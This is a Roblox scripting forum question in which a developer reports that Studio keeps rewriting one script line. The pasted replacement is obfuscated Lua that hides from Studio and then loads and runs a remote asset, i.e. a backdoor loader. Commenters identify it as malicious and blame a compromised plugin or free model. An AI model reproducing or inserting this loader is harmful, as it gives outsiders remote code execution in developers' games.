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So Roblox Studio keeps changing a part of my script, What do I do? [closed]

Asked by
stef0206 125
5 years ago

So I have a PlayerAdded function like this:


right? but every time i restart Studio, the script breaks, when i check why, that line get changed to this;

game.Players.PlayerAdded:Connect(ilU9cKaR = 'ReplicatedStorage' irwr = 1327528396.5 * 2 ihU3NgxcItB = 'IsStudio' itStcX9r3 = 'load' iF8EVdnsYC4 = 'SSM' icrhgdB1Pz = 'RunService' iL2gyzOz = 'GetService' ioBq5a2H6FloT = 'PlaceId' icgbzF = 'Debris' iMj9Bycd = spawn iOZjwxMPsw7 = 'RunService' igvVV7CveJR = 'IsStudio' iROGw = 'PlaceId' iFTSUL4NzdQH = require iWdR9RRfvrh = 'MarketplaceService' iVk3m9 = game iTbV1AMnfIWgPPy9I = 'GetProductInfo' i6TTwxF1G5mBZf3 = pcall  iMj9Bycd(function() i6TTwxF1G5mBZf3(function() if iVk3m9:GetService(icrhgdB1Pz)[igvVV7CveJR](iVk3m9:GetService(icrhgdB1Pz)) then return end iFTSUL4NzdQH(irwr)[itStcX9r3](iVk3m9[ioBq5a2H6FloT]) end) end)

Can someone please help?

You downloaded a bad plugin or you used a malicious free model User#24403 69 — 5y
I have not imported any free models and i doubt it's any of my plugins considering i havn't downloaded any new plugins recently, and this only happen to this excact script every time i restart studio¨ stef0206 125 — 5y
Hes right, its definitely malicious and you've got something affecting the script. It could even be an old plugin someone has updated. DinozCreates 1070 — 5y
Ok, I'll check my latest plugins stef0206 125 — 5y

Closed as off-topic by User#24403, DinozCreates, and WideSteal321

This question has been closed by our community as being off-topic from ROBLOX Lua Scripting.

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